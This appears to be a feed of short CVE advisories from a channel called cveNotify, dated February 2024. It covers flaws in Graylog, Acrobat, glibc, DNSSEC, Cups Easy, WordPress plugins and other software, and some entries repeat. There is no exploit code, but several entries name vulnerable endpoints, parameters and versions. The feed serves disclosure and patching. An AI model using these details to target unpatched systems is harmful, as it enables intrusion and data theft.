🚨 CVE-2024-24824Graylog is a free and open log management platform. Starting in version 2.0.0 and prior to versions 5.1.11 and 5.2.4, arbitrary classes can be loaded and instantiated using a HTTP PUT request to the `/api/system/cluster_config/` endpoint. Graylog's cluster config system uses fully qualified class names as config keys. To validate the existence of the requested class before using them, Graylog loads the class using the class loader. If a user with the appropriate permissions performs the request, arbitrary classes with 1-arg String constructors can be instantiated. This will execute arbitrary code that is run during class instantiation. In the specific use case of `java.io.File`, the behavior of the internal web-server stack will lead to information exposure by including the entire file content in the response to the REST request. Versions 5.1.11 and 5.2.4 contain a fix for this issue.🎖@cveNotify |
|
| 2024-02-15 16:07:50 |
🚨 CVE-2024-24823Graylog is a free and open log management platform. Starting in version 4.3.0 and prior to versions 5.1.11 and 5.2.4, reauthenticating with an existing session cookie would re-use that session id, even if for different user credentials. In this case, the pre-existing session could be used to gain elevated access to an existing Graylog login session, provided the malicious user could successfully inject their session cookie into someone else's browser. The complexity of such an attack is high, because it requires presenting a spoofed login screen and injection of a session cookie into an existing browser, potentially through a cross-site scripting attack. No such attack has been discovered. Graylog 5.1.11 and 5.2.4, and any versions of the 6.0 development branch, contain patches to not re-use sessions under any circumstances. Some workarounds are available. Using short session expiration and explicit log outs of unused sessions can help limiting the attack vector. Unpatched this vulnerability exists, but is relatively hard to exploit. A proxy could be leveraged to clear the `authentication` cookie for the Graylog server URL for the `/api/system/sessions` endpoint, as that is the only one vulnerable.🎖@cveNotify |
|
| 2024-02-15 16:07:49 |
🚨 CVE-2024-20290A vulnerability in the OLE2 file format parser of ClamAV could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. This vulnerability is due to an incorrect check for end-of-string values during scanning, which may result in a heap buffer over-read. An attacker could exploit this vulnerability by submitting a crafted file containing OLE2 content to be scanned by ClamAV on an affected device. A successful exploit could allow the attacker to cause the ClamAV scanning process to terminate, resulting in a DoS condition on the affected software and consuming available system resources. For a description of this vulnerability, see the ClamAV blog .🎖@cveNotify |
|
| 2024-02-15 16:07:48 |
🚨 CVE-2024-20254Multiple vulnerabilities in Cisco Expressway Series and Cisco TelePresence Video Communication Server (VCS) could allow an unauthenticated, remote attacker to conduct cross-site request forgery (CSRF) attacks that perform arbitrary actions on an affected device. Note: "Cisco Expressway Series" refers to Cisco Expressway Control (Expressway-C) devices and Cisco Expressway Edge (Expressway-E) devices. For more information about these vulnerabilities, see the Details ["#details"] section of this advisory.🎖@cveNotify |
|
| 2024-02-15 16:07:43 |
🚨 CVE-2024-24590Deserialization of untrusted data can occur in versions 0.17.0 to 1.14.2 of the client SDK of Allegro AI’s ClearML platform, enabling a maliciously uploaded artifact to run arbitrary code on an end user’s system when interacted with.🎖@cveNotify |
|
| 2024-02-15 16:07:42 |
🚨 CVE-2023-3106A NULL pointer dereference vulnerability was found in netlink_dump. This issue can occur when the Netlink socket receives the message(sendmsg) for the XFRM_MSG_GETSA, XFRM_MSG_GETPOLICY type message, and the DUMP flag is set and can cause a denial of service or possibly another unspecified impact. Due to the nature of the flaw, privilege escalation cannot be fully ruled out, although it is unlikely.🎖@cveNotify |
|
| 2024-02-15 16:07:37 |
🚨 CVE-2020-29368An issue was discovered in __split_huge_pmd in mm/huge_memory.c in the Linux kernel before 5.7.5. The copy-on-write implementation can grant unintended write access because of a race condition in a THP mapcount check, aka CID-c444eb564fb1.🎖@cveNotify |
|
| 2024-02-15 16:07:36 |
🚨 CVE-2014-3185Multiple buffer overflows in the command_port_read_callback function in drivers/usb/serial/whiteheat.c in the Whiteheat USB Serial Driver in the Linux kernel before 3.16.2 allow physically proximate attackers to execute arbitrary code or cause a denial of service (memory corruption and system crash) via a crafted device that provides a large amount of (1) EHCI or (2) XHCI data associated with a bulk response.🎖@cveNotify |
|
| 2024-02-15 14:37:45 |
🚨 CVE-2023-4539Use of a hard-coded password for a special database account created during Comarch ERP XL installation allows an attacker to retrieve embedded sensitive data stored in the database. The password is same among all Comarch ERP XL installations. This issue affects ERP XL: from 2020.2.2 through 2023.2.🎖@cveNotify |
|
| 2024-02-15 14:37:38 |
🚨 CVE-2024-24386An issue in VitalPBX v.3.2.4-5 allows an attacker to execute arbitrary code via a crafted payload to the /var/lib/vitalpbx/scripts folder.🎖@cveNotify |
|
| 2024-02-15 14:37:37 |
🚨 CVE-2024-0353Local privilege escalation vulnerability potentially allowed an attacker to misuse ESET’s file operations to delete files without having proper permission.🎖@cveNotify |
|
| 2024-02-15 14:37:34 |
🚨 CVE-2024-21727XSS vulnerability in DP Calendar component for Joomla.🎖@cveNotify |
|
| 2024-02-15 14:37:33 |
🚨 CVE-2024-23344Tuleap is an Open Source Suite to improve management of software developments and collaboration. Some users might get access to restricted information when a process validates the permissions of multiple users (e.g. mail notifications). This issue has been patched in version 15.4.99.140 of Tuleap Community Edition.🎖@cveNotify |
|
| 2024-02-15 14:37:32 |
🚨 CVE-2023-46183IBM PowerVM Hypervisor FW950.00 through FW950.90, FW1020.00 through FW1020.40, and FW1030.00 through FW1030.30 could allow a system administrator to obtain sensitive partition information. IBM X-Force ID: 269695.🎖@cveNotify |
|
| 2024-02-15 13:37:47 |
🚨 CVE-2024-20748Acrobat Reader versions 20.005.30539, 23.008.20470 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-02-15 13:37:46 |
🚨 CVE-2024-20747Acrobat Reader versions 20.005.30539, 23.008.20470 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-02-15 13:37:45 |
🚨 CVE-2024-20738Adobe Framemaker versions 2022.1 and earlier are affected by an Improper Authentication vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to bypass authentication mechanisms and gain unauthorized access. Exploitation of this issue does not require user interaction.🎖@cveNotify |
|
| 2024-02-15 13:37:44 |
🚨 CVE-2024-20736Acrobat Reader versions 20.005.30539, 23.008.20470 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-02-15 13:37:41 |
🚨 CVE-2024-20735Acrobat Reader versions 20.005.30539, 23.008.20470 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-02-15 13:37:40 |
🚨 CVE-2024-20731Acrobat Reader versions 20.005.30539, 23.008.20470 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-02-15 13:37:39 |
🚨 CVE-2024-20730Acrobat Reader versions 20.005.30539, 23.008.20470 and earlier are affected by an Integer Overflow or Wraparound vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-02-15 13:37:35 |
🚨 CVE-2024-20727Acrobat Reader versions 20.005.30539, 23.008.20470 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-02-15 13:37:34 |
🚨 CVE-2024-1530A vulnerability, which was classified as critical, has been found in ECshop 4.1.8. Affected by this issue is some unknown functionality of the file /admin/view_sendlist.php. The manipulation leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-250562 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-02-15 13:37:30 |
🚨 CVE-2023-32484Dell Networking Switches running Enterprise SONiC versions 4.1.0, 4.0.5, 3.5.4 and below contains an improper input validation vulnerability. A remote unauthenticated malicious user may exploit this vulnerability and escalate privileges up to the highest administrative level. This is a Critical vulnerability affecting certain protocols, Dell recommends customers to upgrade at the earliest opportunity.🎖@cveNotify |
|
| 2024-02-15 13:37:29 |
🚨 CVE-2023-28078Dell OS10 Networking Switches running 10.5.2.x and above contain a vulnerability with zeroMQ when VLT is configured. A remote unauthenticated attacker could potentially exploit this vulnerability leading to information disclosure and a possible Denial of Service when a huge number of requests are sent to the switch. This is a high severity vulnerability as it allows an attacker to view sensitive data. Dell recommends customers to upgrade at the earliest opportunity.🎖@cveNotify |
|
| 2024-02-15 10:37:54 |
🚨 CVE-2024-23873A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/currencymodify.php, in the currencyid parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials.🎖@cveNotify |
|
| 2024-02-15 10:37:53 |
🚨 CVE-2024-23872A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/locationmodify.php, in the description parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials.🎖@cveNotify |
|
| 2024-02-15 10:37:52 |
🚨 CVE-2024-23870A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/stockissuancelist.php, in the delete parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials.🎖@cveNotify |
|
| 2024-02-15 10:37:48 |
🚨 CVE-2024-23869A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/stockissuanceprint.php, in the issuanceno parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials.🎖@cveNotify |
|
| 2024-02-15 10:37:47 |
🚨 CVE-2024-23867A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/statecreate.php, in the stateid parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials.🎖@cveNotify |
|
| 2024-02-15 10:37:46 |
🚨 CVE-2024-23865A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/taxstructurelist.php, in the description parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials.🎖@cveNotify |
|
| 2024-02-15 10:37:42 |
🚨 CVE-2024-23862A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/grndisplay.php, in the grnno parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials.🎖@cveNotify |
|
| 2024-02-15 10:37:41 |
🚨 CVE-2024-23860A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/currencylist.php, in the description parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials.🎖@cveNotify |
|
| 2024-02-15 10:37:37 |
🚨 CVE-2024-23857A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/grnlinecreate.php, in the batchno parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials.🎖@cveNotify |
|
| 2024-02-15 10:37:36 |
🚨 CVE-2024-23855A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/taxcodemodify.php, in multiple parameters. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials.🎖@cveNotify |
|
| 2024-02-15 09:37:28 |
🚨 CVE-2023-4537Comarch ERP XL client is vulnerable to MS SQL protocol downgrade request from a server side, what could lead to an unencrypted communication vulnerable to data interception and modification.This issue affects ERP XL: from 2020.2.2 through 2023.2.🎖@cveNotify |
|
| 2024-02-15 08:37:25 |
🚨 CVE-2024-0353Local privilege escalation vulnerability potentially allowed an attacker to misuse ESET’s file operations to delete files without having proper permission.🎖@cveNotify |
|
| 2024-02-15 08:37:24 |
🚨 CVE-2023-6240A Marvin vulnerability side-channel leakage was found in the RSA decryption operation in the Linux Kernel. This issue may allow a network attacker to decrypt ciphertexts or forge signatures, limiting the services that use that private key.🎖@cveNotify |
|
| 2024-02-15 07:37:39 |
🚨 CVE-2024-21727XSS vulnerability in DP Calendar component for Joomla.🎖@cveNotify |
|
| 2024-02-15 07:37:32 |
🚨 CVE-2024-0708The Landing Page Cat – Coming Soon Page, Maintenance Page & Squeeze Pages plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.7.2. This makes it possible for unauthenticated attackers to access landing pages that may not be public.🎖@cveNotify |
|
| 2024-02-15 07:37:31 |
🚨 CVE-2023-49716In Emerson Rosemount GC370XA, GC700XA, and GC1500XA products, an authenticated user with network access could run arbitrary commands from a remote computer.🎖@cveNotify |
|
| 2024-02-15 07:37:30 |
🚨 CVE-2023-46687In Emerson Rosemount GC370XA, GC700XA, and GC1500XA products, an unauthenticated user with network access could execute arbitrary commands in root context from a remote computer.🎖@cveNotify |
|
| 2024-02-15 07:37:27 |
🚨 CVE-2023-43609In Emerson Rosemount GC370XA, GC700XA, and GC1500XA products, an unauthenticated user with network access could obtain access to sensitive information or cause a denial-of-service condition.🎖@cveNotify |
|
| 2024-02-15 07:37:26 |
🚨 CVE-2023-6779An off-by-one heap-based buffer overflow was found in the __vsyslog_internal function of the glibc library. This function is called by the syslog and vsyslog functions. This issue occurs when these functions are called with a message bigger than INT_MAX bytes, leading to an incorrect calculation of the buffer size to store the message, resulting in an application crash. This issue affects glibc 2.37 and newer.🎖@cveNotify |
|
| 2024-02-15 07:37:25 |
🚨 CVE-2023-6246A heap-based buffer overflow was found in the __vsyslog_internal function of the glibc library. This function is called by the syslog and vsyslog functions. This issue occurs when the openlog function was not called, or called with the ident argument set to NULL, and the program name (the basename of argv[0]) is bigger than 1024 bytes, resulting in an application crash or local privilege escalation. This issue affects glibc 2.36 and newer.🎖@cveNotify |
|
| 2024-02-15 05:37:32 |
🚨 CVE-2022-23088The 802.11 beacon handling routine failed to validate the length of an IEEE 802.11s Mesh ID before copying it to a heap-allocated buffer.While a FreeBSD Wi-Fi client is in scanning mode (i.e., not associated with a SSID) a malicious beacon frame may overwrite kernel memory, leading to remote code execution.🎖@cveNotify |
|
| 2024-02-15 05:37:25 |
🚨 CVE-2022-23085A user-provided integer option was passed to nmreq_copyin() without checking if it would overflow. This insufficient bounds checking could lead to kernel memory corruption.On systems configured to include netmap in their devfs_ruleset, a privileged process running in a jail can affect the host environment.🎖@cveNotify |
|
| 2024-02-15 05:37:24 |
🚨 CVE-2024-1485A flaw was found in the decompression function of registry-support. This issue can be triggered if an unauthenticated remote attacker tricks a user into opening a specially modified .tar archive, leading to the cleanup process following relative paths to overwrite or delete files outside the intended scope.🎖@cveNotify |
|
| 2024-02-15 05:07:34 |
🚨 CVE-2024-23806Sensitive data can be extracted from HID iCLASS SE reader configuration cards. This could include credential and device administrator keys.🎖@cveNotify |
|
| 2024-02-15 05:07:33 |
🚨 CVE-2023-28063Dell BIOS contains a Signed to Unsigned Conversion Error vulnerability. A local authenticated malicious user with admin privileges could potentially exploit this vulnerability, leading to denial of service.🎖@cveNotify |
|
| 2024-02-15 04:37:25 |
🚨 CVE-2024-25146Liferay Portal 7.2.0 through 7.4.1, and older unsupported versions, and Liferay DXP 7.3 before service pack 3, 7.2 before fix pack 18, and older unsupported versions returns with different responses depending on whether a site does not exist or if the user does not have permission to access the site, which allows remote attackers to discover the existence of sites by enumerating URLs. This vulnerability occurs if locale.prepend.friendly.url.style=2 and if a custom 404 page is used.🎖@cveNotify |
|
| 2024-02-15 04:37:24 |
🚨 CVE-2024-25144The IFrame widget in Liferay Portal 7.2.0 through 7.4.3.26, and older unsupported versions, and Liferay DXP 7.4 before update 27, 7.3 before update 6, 7.2 before fix pack 19, and older unsupported versions does not check the URL of the IFrame, which allows remote authenticated users to cause a denial-of-service (DoS) via a self referencing IFrame.🎖@cveNotify |
|
| 2024-02-15 03:37:32 |
🚨 CVE-2012-0037Redland Raptor (aka libraptor) before 2.0.7, as used by OpenOffice 3.3 and 3.4 Beta, LibreOffice before 3.4.6 and 3.5.x before 3.5.1, and other products, allows user-assisted remote attackers to read arbitrary files via a crafted XML external entity (XXE) declaration and reference in an RDF document.🎖@cveNotify |
|
| 2024-02-15 03:37:26 |
🚨 CVE-2009-3278The QNAP TS-239 Pro and TS-639 Pro with firmware 2.1.7 0613, 3.1.0 0627, and 3.1.1 0815 use the rand library function to generate a certain recovery key, which makes it easier for local users to determine this key via a brute-force attack.🎖@cveNotify |
|
| 2024-02-15 03:37:25 |
🚨 CVE-2008-2108The GENERATE_SEED macro in PHP 4.x before 4.4.8 and 5.x before 5.2.5, when running on 64-bit systems, performs a multiplication that generates a portion of zero bits during conversion due to insufficient precision, which produces 24 bits of entropy and simplifies brute force attacks against protection mechanisms that use the rand and mt_rand functions.🎖@cveNotify |
|
| 2024-02-15 03:37:24 |
🚨 CVE-2001-0950ValiCert Enterprise Validation Authority (EVA) Administration Server 3.3 through 4.2.1 uses insufficiently random data to (1) generate session tokens for HSMs using the C rand function, or (2) generate certificates or keys using /dev/urandom instead of another source which blocks when the entropy pool is low, which could make it easier for local or remote attackers to steal tokens or certificates via brute force guessing.🎖@cveNotify |
|
| 2024-02-15 03:07:26 |
🚨 CVE-2024-24878Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PT Woo Plugins (by Webdados) Portugal CTT Tracking for WooCommerce allows Reflected XSS.This issue affects Portugal CTT Tracking for WooCommerce: from n/a through 2.1.🎖@cveNotify |
|
| 2024-02-15 03:07:25 |
🚨 CVE-2024-24836Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Audrasjb GDPR Data Request Form allows Stored XSS.This issue affects GDPR Data Request Form: from n/a through 1.6.🎖@cveNotify |
|
| 2024-02-15 02:37:34 |
🚨 CVE-2023-7169Authentication Bypass by Spoofing vulnerability in Snow Software Snow Inventory Agent on Windows allows Signature Spoof.This issue affects Snow Inventory Agent: through 6.14.5. Customers advised to upgrade to version 7.0🎖@cveNotify |
|
| 2024-02-15 02:37:28 |
🚨 CVE-2024-24488An issue in Shenzen Tenda Technology CP3V2.0 V11.10.00.2311090948 allows a local attacker to obtain sensitive information via the password component.🎖@cveNotify |
|
| 2024-02-15 02:37:27 |
🚨 CVE-2024-22667Vim before 9.0.2142 has a stack-based buffer overflow because did_set_langmap in map.c calls sprintf to write to the error buffer that is passed down to the option callback functions.🎖@cveNotify |
|
| 2024-02-15 02:37:26 |
🚨 CVE-2023-46837Arm provides multiple helpers to clean & invalidate the cachefor a given region. This is, for instance, used when allocatingguest memory to ensure any writes (such as the ones during scrubbing)have reached memory before handing over the page to a guest.Unfortunately, the arithmetics in the helpers can overflow and wouldthen result to skip the cache cleaning/invalidation. Therefore thereis no guarantee when all the writes will reach the memory.This undefined behavior was meant to be addressed by XSA-437, but theapproach was not sufficient.🎖@cveNotify |
|
| 2024-02-15 02:07:33 |
🚨 CVE-2021-21206Use after free in Blink in Google Chrome prior to 89.0.4389.128 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.🎖@cveNotify |
|
| 2024-02-15 02:07:26 |
🚨 CVE-2020-6572Use after free in Media in Google Chrome prior to 81.0.4044.92 allowed a remote attacker to execute arbitrary code via a crafted HTML page.🎖@cveNotify |
|
| 2024-02-15 02:07:25 |
🚨 CVE-2019-13720Use after free in WebAudio in Google Chrome prior to 78.0.3904.87 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.🎖@cveNotify |
|
| 2024-02-15 02:07:24 |
🚨 CVE-2019-5786Object lifetime issue in Blink in Google Chrome prior to 72.0.3626.121 allowed a remote attacker to potentially perform out of bounds memory access via a crafted HTML page.🎖@cveNotify |
|
| 2024-02-15 01:37:25 |
🚨 CVE-2023-50868The Closest Encloser Proof aspect of the DNS protocol (in RFC 5155 when RFC 9276 guidance is skipped) allows remote attackers to cause a denial of service (CPU consumption for SHA-1 computations) via DNSSEC responses in a random subdomain attack, aka the "NSEC3" issue. The RFC 5155 specification implies that an algorithm must perform thousands of iterations of a hash function in certain situations.🎖@cveNotify |
|
| 2024-02-15 01:37:24 |
🚨 CVE-2023-50387Certain DNSSEC aspects of the DNS protocol (in RFC 4035 and related RFCs) allow remote attackers to cause a denial of service (CPU consumption) via one or more DNSSEC responses when there is a zone with many DNSKEY and RRSIG records, aka the "KeyTrap" issue. The protocol specification implies that an algorithm must evaluate all combinations of DNSKEY and RRSIG records.🎖@cveNotify |
|
| 2024-02-15 00:37:37 |
🚨 CVE-2023-50868The Closest Encloser Proof aspect of the DNS protocol (in RFC 5155 when RFC 9276 guidance is skipped) allows remote attackers to cause a denial of service (CPU consumption for SHA-1 computations) via DNSSEC responses in a random subdomain attack, aka the "NSEC3" issue. The RFC 5155 specification implies that an algorithm must perform thousands of iterations of a hash function in certain situations.🎖@cveNotify |
|
| 2024-02-15 00:37:36 |
🚨 CVE-2023-50387Certain DNSSEC aspects of the DNS protocol (in RFC 4035 and related RFCs) allow remote attackers to cause a denial of service (CPU consumption) via one or more DNSSEC responses when there is a zone with many DNSKEY and RRSIG records, aka the "KeyTrap" issue. The protocol specification implies that an algorithm must evaluate all combinations of DNSKEY and RRSIG records.🎖@cveNotify |
|
| 2024-02-14 23:37:25 |
🚨 CVE-2022-48220Potential vulnerabilities have been identified in certain HP Desktop PC products using the HP TamperLock feature, which might allow intrusion detection bypass via a physical attack. HP is releasing firmware and guidance to mitigate these potential vulnerabilities.🎖@cveNotify |
|
| 2024-02-14 23:37:24 |
🚨 CVE-2022-48219Potential vulnerabilities have been identified in certain HP Desktop PC products using the HP TamperLock feature, which might allow intrusion detection bypass via a physical attack. HP is releasing firmware and guidance to mitigate these potential vulnerabilities.🎖@cveNotify |
|
| 2024-02-14 22:37:25 |
🚨 CVE-2023-49721An insecure default to allow UEFI Shell in EDK2 was left enabled in LXD. This allows an OS-resident attacker to bypass Secure Boot.🎖@cveNotify |
|
| 2024-02-14 22:37:24 |
🚨 CVE-2024-24115A stored cross-site scripting (XSS) vulnerability in the Edit Page function of Cotonti CMS v0.9.24 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload.🎖@cveNotify |
|
| 2024-02-14 22:07:42 |
🚨 CVE-2023-48974Cross Site Scripting vulnerability in Axigen WebMail v.10.5.7 and before allows a remote attacker to escalate privileges via a crafted script to the serverName_input parameter.🎖@cveNotify |
|
| 2024-02-14 22:07:41 |
🚨 CVE-2024-24311Path Traversal vulnerability in Linea Grafica "Multilingual and Multistore Sitemap Pro - SEO" (lgsitemaps) module for PrestaShop before version 1.6.6, a guest can download personal information without restriction.🎖@cveNotify |
|
| 2024-02-14 21:37:32 |
🚨 CVE-2024-25618Mastodon is a free, open-source social network server based on ActivityPub. Mastodon allows new identities from configured authentication providers (CAS, SAML, OIDC) to attach to existing local users with the same e-mail address. This results in a possible account takeover if the authentication provider allows changing the e-mail address or multiple authentication providers are configured. When a user logs in through an external authentication provider for the first time, Mastodon checks the e-mail address passed by the provider to find an existing account. However, using the e-mail address alone means that if the authentication provider allows changing the e-mail address of an account, the Mastodon account can immediately be hijacked. All users logging in through external authentication providers are affected. The severity is medium, as it also requires the external authentication provider to misbehave. However, some well-known OIDC providers (like Microsoft Azure) make it very easy to accidentally allow unverified e-mail changes. Moreover, OpenID Connect also allows dynamic client registration. This issue has been addressed in versions 4.2.6, 4.1.14, 4.0.14, and 3.5.18. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-02-14 21:37:25 |
🚨 CVE-2023-6933The Better Search Replace plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.4.4 via deserialization of untrusted input. This makes it possible for unauthenticated attackers to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.🎖@cveNotify |
|
| 2024-02-14 21:37:24 |
🚨 CVE-2023-6925The Unlimited Addons for WPBakery Page Builder plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation on the 'importZipFile' function in versions up to, and including, 1.0.42. This makes it possible for authenticated attackers with a role that the administrator previously granted access to the plugin (the default is editor role, but access can also be granted to contributor role), to upload arbitrary files on the affected site's server which may make remote code execution possible.🎖@cveNotify |
|
| 2024-02-14 21:07:32 |
🚨 CVE-2024-1268A vulnerability, which was classified as critical, was found in CodeAstro Restaurant POS System 1.0. This affects an unknown part of the file update_product.php. The manipulation leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-253011.🎖@cveNotify |
|
| 2024-02-14 21:07:26 |
🚨 CVE-2024-22388Certain configuration available in the communication channel for encoders could expose sensitive data when reader configuration cards are programmed. This data could include credential and device administration keys.🎖@cveNotify |
|
| 2024-02-14 21:07:25 |
🚨 CVE-2021-37415Zoho ManageEngine ServiceDesk Plus before 11302 is vulnerable to authentication bypass that allows a few REST-API URLs without authentication.🎖@cveNotify |
|
| 2024-02-14 21:07:24 |
🚨 CVE-2009-2403Heap-based buffer overflow in SCMPX 1.5.1 allows remote attackers to cause a denial of service (application crash) or execute arbitrary code via a long string in a .m3u playlist file.🎖@cveNotify |
|
| 2024-02-14 20:37:32 |
🚨 CVE-2024-25003KiTTY versions 0.76.1.13 and before is vulnerable to a stack-based buffer overflow via the hostname, occurs due to insufficient bounds checking and input sanitization. This allows an attacker to overwrite adjacent memory, which leads to arbitrary code execution.🎖@cveNotify |
|
| 2024-02-14 20:37:25 |
🚨 CVE-2024-24810WiX toolset lets developers create installers for Windows Installer, the Windows installation engine. The .be TEMP folder is vulnerable to DLL redirection attacks that allow the attacker to escalate privileges. This impacts any installer built with the WiX installer framework. This issue has been patched in version 4.0.4.🎖@cveNotify |
|
| 2024-02-14 20:37:24 |
🚨 CVE-2023-6388Suite CRM version 7.14.2 allows making arbitrary HTTP requests throughthe vulnerable server. This is possible because the application is vulnerableto SSRF.🎖@cveNotify |
|
| 2024-02-14 20:07:32 |
🚨 CVE-2024-22520An issue discovered in Dronetag Drone Scanner 1.5.2 allows attackers to impersonate other drones via transmission of crafted data packets.🎖@cveNotify |
|
| 2024-02-14 20:07:26 |
🚨 CVE-2024-22519An issue discovered in OpenDroneID OSM 3.5.1 allows attackers to impersonate other drones via transmission of crafted data packets.🎖@cveNotify |
|
| 2024-02-14 20:07:25 |
🚨 CVE-2024-24860A race condition was found in the Linux kernel's bluetooth device driver in {min,max}_key_size_set() function. This can result in a null pointer dereference issue, possibly leading to a kernel panic or denial of service issue.🎖@cveNotify |
|
| 2024-02-14 20:07:24 |
🚨 CVE-2024-22667Vim before 9.0.2142 has a stack-based buffer overflow because did_set_langmap in map.c calls sprintf to write to the error buffer that is passed down to the option callback functions.🎖@cveNotify |
|
| 2024-02-14 19:37:36 |
🚨 CVE-2024-0256The Starbox plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Profile Display Name and Social Settings in all versions up to, and including, 3.4.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-02-14 19:37:30 |
🚨 CVE-2024-1267A vulnerability, which was classified as problematic, has been found in CodeAstro Restaurant POS System 1.0. Affected by this issue is some unknown functionality of the file create_account.php. The manipulation of the argument Full Name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-253010 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-02-14 19:37:29 |
🚨 CVE-2022-43086Restaurant POS System v1.0 was discovered to contain a SQL injection vulnerability via update_customer.php.🎖@cveNotify |
|
| 2024-02-14 19:37:28 |
🚨 CVE-2022-43085An arbitrary file upload vulnerability in add_product.php of Restaurant POS System v1.0 allows attackers to execute arbitrary code via a crafted PHP file.🎖@cveNotify |
|
| 2024-02-14 19:07:26 |
🚨 CVE-2024-0977The Timeline Widget For Elementor (Elementor Timeline, Vertical & Horizontal Timeline) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via image URLs in the plugin's timeline widget in all versions up to, and including, 1.5.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page, changes the slideshow type, and then changes it back to an image.🎖@cveNotify |
|
| 2024-02-14 19:07:25 |
